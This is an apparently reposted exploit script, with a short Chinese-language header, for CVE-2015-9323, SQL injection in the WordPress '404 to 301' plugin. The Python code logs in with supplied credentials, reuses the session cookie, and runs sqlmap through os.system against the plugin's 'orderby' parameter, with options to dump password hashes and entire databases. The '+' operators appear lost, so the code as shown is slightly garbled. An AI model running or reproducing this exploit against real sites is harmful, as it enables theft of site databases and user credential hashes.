Wordpress Plugin 404 to 301 2.0.2 SQL-Injection

2022-03-03 09:20:32 浏览数 (1)

# 版本:<= 2.0.2

# 测试环境:Ubuntu 20.04

# CVE:CVE-2015-9323

# CWE:CWE-89

# 文档:https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md

'''

描述:

WordPress 2.0.3 之前的 404-to-301 插件有 SQL 注入。

'''

代码语言:javascript复制
banner = '''       
                                             
 .o88b. db    db d88888b        .d888b.  .d88b.   db   ooooo        .d888b. d8888b. .d888b. d8888b. 
d8P  Y8 88    88 88'            VP  `8D .8P  88. o88  8P~~~~        88' `8D VP  `8D VP  `8D VP  `8D 
8P      Y8    8P 88ooooo           odD' 88  d'88  88 dP             `V8o88'   oooY'    odD'   oooY' 
8b      `8b  d8' 88~~~~~ C8888D  .88'   88 d' 88  88 V8888b. C8888D    d8'    ~~~b.  .88'     ~~~b. 
Y8b  d8  `8bd8'  88.            j88.    `88  d8'  88     `8D          d8'   db   8D j88.    db   8D 
 `Y88P'    YP    Y88888P        888888D  `Y88P'   VP 88oobY'         d8'    Y8888P' 888888D Y8888P' 
  
                                                            [ ] 404 to 301 - SQL-Injection 
                                                            [@] Developed by Ron Jost (Hacker5preme)
                                                        
'''
print(banner)

import argparse
import os
import requests
from datetime import datetime
import json

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: '   str(datetime.now().strftime('%H:%M:%S')))


# Authentication:
session = requests.Session()
auth_url = 'http://'   target_ip   ':'   target_port   wp_path   'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://'   target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):

# Generate payload for sqlmap
print ('[ ] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

exploit_url = r'sqlmap -u "http://'   target_ip   ':'   target_port   wp_path   r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
exploit_risk = ' --level 2 --risk 2'
exploit_cookie = r' --cookie="'   cookie   r'" '

print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploit_code = exploit_url   exploit_risk   exploit_cookie   retrieve_mode   ' -p orderby -v0'
os.system(exploit_code)
print('Exploit finished at: '   str(datetime.now().strftime('%H:%M:%S')))

0 人点赞